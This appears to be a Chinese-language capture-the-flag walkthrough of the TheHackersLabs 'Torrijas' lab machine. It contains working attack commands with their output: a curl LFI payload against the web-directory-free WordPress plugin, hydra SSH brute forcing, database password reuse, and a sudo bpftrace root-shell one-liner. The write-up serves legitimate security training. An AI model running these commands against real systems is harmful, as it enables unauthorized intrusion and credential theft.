TheHackersLabs-Torrijas-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.183  08:00:27:86:4d:2e       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f7:93:e4       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.025 seconds (126.42 hosts/sec). 4 responded
❯ export ip=192.168.60.183
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.183:22
Open 192.168.60.183:80
Open 192.168.60.183:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:53 CST
Initiating ARP Ping Scan at 14:53
Scanning 192.168.60.183 [1 port]
Completed ARP Ping Scan at 14:53, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:53
Completed Parallel DNS resolution of 1 host. at 14:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:53
Scanning 192.168.60.183 [3 ports]
Discovered open port 22/tcp on 192.168.60.183
Discovered open port 80/tcp on 192.168.60.183
Discovered open port 3306/tcp on 192.168.60.183
Completed SYN Stealth Scan at 14:53, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.183
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-02-14 14:53:03 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3306/tcp open  mysql   syn-ack ttl 64
MAC Address: 08:00:27:86:4D:2E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

浏览器访问一下80端口

简单看了一下，基本上都是锚点链接

看一下网站类型

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.183
Status    : 200 OK
Title     : torrija.thl
IP        : 192.168.60.183
Country   : RESERVED, ZZ

Summary   : Apache[2.4.62], Bootstrap, Email[[email protected]], Frame, HTML5, HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], JQuery[3.0.0], Script[text/javascript], X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.62 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Website     : https://getbootstrap.com/

[ Email ]
        Extract email addresses. Find valid email address and
        syntactically invalid email addresses from mailto: link
        tags. We match syntactically invalid links containing
        mailto: to catch anti-spam email addresses, eg. bob at
        gmail.com. This uses the simplified email regular
        expression from
        http://www.regular-expressions.info/email.html for valid
        email address matching.

        String       : [email protected]

[ Frame ]
        This plugin detects instances of frame and iframe HTML
        elements.


[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.62 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Version      : 3.0.0
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : text/javascript

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the
        HTTP header and meta http-equiv tag. - More Info:
        http://msdn.microsoft.com/en-us/library/cc817574.aspx

        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Fri, 14 Feb 2025 06:55:45 GMT
        Server: Apache/2.4.62 (Debian)
        Last-Modified: Thu, 13 Feb 2025 18:50:56 GMT
        ETag: "5161-62e0a89c85c3e-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3061
        Connection: close
        Content-Type: text/html

扫一下目录

发现还有个子网站是基于wordpress

❯ feroxbuster -u http://$ip
                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.60.183
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[####################] - 65s   301341/301341  0s      found:1045    errors:214
[####################] - 29s    30000/30000   1029/s  http://192.168.60.183/
[####################] - 5s     30000/30000   5681/s  http://192.168.60.183/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 50s    30000/30000   605/s   http://192.168.60.183/wordpress/
[####################] - 4s     30000/30000   8251/s  http://192.168.60.183/js/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 4s     30000/30000   7218/s  http://192.168.60.183/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 46s    30000/30000   645/s   http://192.168.60.183/wordpress/wp-content/
[####################] - 54s    30000/30000   557/s   http://192.168.60.183/wordpress/wp-admin/
[####################] - 13s    30000/30000   2362/s  http://192.168.60.183/wordpress/wp-includes/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s     30000/30000   6652/s  http://192.168.60.183/wordpress/wp-content/uploads/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s     30000/30000   5468/s  http://192.168.60.183/wordpress/wp-content/languages/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s     30000/30000   6020/s  http://192.168.60.183/wordpress/wp-includes/Requests/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 5s     30000/30000   5790/s  http://192.168.60.183/wordpress/wp-includes/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 10s    30000/30000   2878/s  http://192.168.60.183/wordpress/wp-includes/fonts/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 48s    30000/30000   625/s   http://192.168.60.183/wordpress/wp-includes/blocks/
[####################] - 6s     30000/30000   4803/s  http://192.168.60.183/wordpress/wp-includes/sitemaps/ => Directory listing (add --scan-dir-listings to scan)%

LFI漏洞利用

利用wpscan扫一下插件，启用主动扫描全部插件

❯ wpscan --url http://$ip/wordpress -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.183/wordpress/ [192.168.60.183]
[+] Started: Fri Feb 14 14:59:14 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.62 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.183/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.183/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.60.183/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.183/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Latest, released on 2025-02-11).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.60.183/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.60.183/wordpress/, Match: 'WordPress 6.7.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.60.183/wordpress/wp-content/plugins/akismet/
 | Latest Version: 5.3.6 (up to date)
 | Last Updated: 2025-02-04T21:01:00.000Z
 | Readme: http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.183/wordpress/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.60.183/wordpress/wp-content/plugins/akismet/readme.txt

[+] web-directory-free
 | Location: http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/
 | Last Updated: 2024-12-11T14:06:00.000Z
 | Readme: http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/readme.txt
 | [!] The version is out of date, the latest version is 1.7.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/, status: 200
 |
 | Version: 1.7.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.60.183/wordpress/wp-content/plugins/web-directory-free/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <> (0 / 10)  0.00%  ETA: ??:??: Brute Forcing Author IDs - Time: 00:00:00 <> (1 / 10) 10.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (3 / 10) 30.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (4 / 10) 40.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (5 / 10) 50.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (6 / 10) 60.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (8 / 10) 80.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (9 / 10) 90.00%  ETA: 00:00: Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Feb 14 15:00:36 2025
[+] Requests Done: 109129
[+] Cached Requests: 42
[+] Data Sent: 31.695 MB
[+] Data Received: 14.64 MB
[+] Memory used: 437.473 MB
[+] Elapsed time: 00:01:21

发现web-directory-free这个插件版本不是最新，最新版本为1.7.5，目前版本是1.7.2

网上找到有LFI漏洞

尝试利用一下

果然得到敏感文件内容

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd"
{"html":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndebian:x:1000:1000:debian,,,:\/home\/debian:\/bin\/bash\nmysql:x:102:110:MySQL Server,,,:\/nonexistent:\/bin\/false\nprimo:x:1001:1001::\/home\/primo:\/bin\/bash\npremo:x:1002:1002::\/home\/premo:\/bin\/bash\n","hash":"91d75cb01d4a5d829e86bca1858566db","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%

简单格式化一下

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
primo:x:1001:1001::/home/primo:/bin/bash
premo:x:1002:1002::/home/premo:/bin/bash

从中得到primo用户以及premo用户

我尝试直接读取user，无果

大概是权限不够

不过你仔细发现html后面如果文件没有会显示null

如果有文件但没法读则会为空

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/home/primo/user.txt"
{"html":null,"hash":"2f8d20ccdadf991c5fa992b7d7b1c79d","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%
❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/home/premo/user.txt"
{"html":"","hash":"915fb6db2aff54fe69bf636cdbb97076","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%

我尝试读取wp-admin.php，无果

文件是存在的，但读不出来

❯ curl -X POST http://torrija.thl/wordpress/wp-admin/admin-ajax.php -d "from_set_ajax=1&action=w2dc_controller_request&template=/var/www/html/wordpress/wp-config.php"
{"html":"","hash":"6336cf0a5ee6eb5e5899b7fbe2353afd","map_markers":"","map_listings":"","hide_show_more_listings_button":1,"sql":"","params":"","base_url":"http:\/\/torrija.thl\/wordpress"}%

hydra爆破

在这卡这，没办法最后只能尝试ssh爆破了

两个用户分别爆破

最终得到了用户premo密码cassandra

❯ hydra -l premo -P /usr/share/wordlists/rockyou.txt ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-14 16:53:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.183:22/
[STATUS] 203.00 tries/min, 203 tries in 00:01h, 14344201 to do in 1177:42h, 11 active
[STATUS] 197.00 tries/min, 591 tries in 00:03h, 14343813 to do in 1213:32h, 11 active
[22][ssh] host: 192.168.60.183   login: premo   password: cassandra
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-14 16:59:10

用户提权

❯ ssh premo@$ip
The authenticity of host '192.168.60.183 (192.168.60.183)' can't be established.
ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.183' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 13 20:08:49 2025 from 192.168.18.204
premo@Torrija-TheHackersLabs:~$

通过查看wp-config.php拿到了数据库密码

尝试登录一下

看一下有没有什么有用信息

premo@Torrija-TheHackersLabs:~$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'admin' );

/** Database password */
define( 'DB_PASSWORD', 'afdvasgvfdsabdgvs6a9vd8sv' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

premo@Torrija-TheHackersLabs:~$ mysql -uadmin -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2638
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0,001 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+---------------------------------+
| Tables_in_wordpress             |
+---------------------------------+
| wp_commentmeta                  |
| wp_comments                     |
| wp_links                        |
| wp_options                      |
| wp_postmeta                     |
| wp_posts                        |
| wp_term_relationships           |
| wp_term_taxonomy                |
| wp_termmeta                     |
| wp_terms                        |
| wp_usermeta                     |
| wp_users                        |
| wp_w2dc_content_fields          |
| wp_w2dc_content_fields_groups   |
| wp_w2dc_directories             |
| wp_w2dc_levels                  |
| wp_w2dc_levels_relationships    |
| wp_w2dc_locations_levels        |
| wp_w2dc_locations_relationships |
| wp_wcsearch_cache               |
+---------------------------------+
20 rows in set (0,000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email | user_url                       | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BKO5Z5XpxXzxeVSnk6HZ68Lp.4NA7Y0 | administrator | [email protected]    | http://192.168.18.57/wordpress | 2025-02-13 15:53:30 |                     |           0 | administrator |
+----+---------------+------------------------------------+---------------+------------+--------------------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0,000 sec)

还有在用户家目录中发现了mysql历史

premo@Torrija-TheHackersLabs:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
use\040Torrijas;
show\040tables;
select\040*\040from\040primo;
exit;

我们可以xarys稍微格式化一下，解析一下被转义的字符

premo@Torrija-TheHackersLabs:~$ cat .mysql_history |xargs -0 echo -e
_HiStOrY_V2_
show databases;
use Torrijas;
show tables;
select * from primo;
exit;

Root提权

这个看似给了一个mysql的密码

其实是大坑，卡了一会

这压根就登录不上

最后尝试利用admin的密码可以成功登录

算是撞库吧，一个密码走天下，哈哈哈

premo@Torrija-TheHackersLabs:~$ mysql -uroot -pafdvasgvfdsabdgvs6a9vd8sv
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 12858
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| Torrijas           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
6 rows in set (0,007 sec)

MariaDB [(none)]> use Torrijas;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [Torrijas]> show tables;
+--------------------+
| Tables_in_Torrijas |
+--------------------+
| primo              |
+--------------------+
1 row in set (0,000 sec)

MariaDB [Torrijas]> select * from primo;
+----+---------+----------------+
| id | usuario | contraseña     |
+----+---------+----------------+
|  1 | primo   | queazeshurmano |
+----+---------+----------------+
1 row in set (0,000 sec)

MariaDB [Torrijas]> exit
Bye
premo@Torrija-TheHackersLabs:~$ su primo
Contraseña:
primo@Torrija-TheHackersLabs:/home/premo$ id
uid=1001(primo) gid=1001(primo) grupos=1001(primo)
primo@Torrija-TheHackersLabs:/home/premo$ sudo -l
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Matching Defaults entries for primo on Torrija-TheHackersLabs:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User primo may run the following commands on Torrija-TheHackersLabs:
    (root) NOPASSWD: /usr/bin/bpftrace

利用bpftrace直接提权即可

primo@Torrija-TheHackersLabs:/home/premo$ sudo bpftrace -c /bin/sh -e 'END {exit()}'
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Attaching 1 probe...
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
f3e431cd1129e9879e482fcb2cc151e8  -
#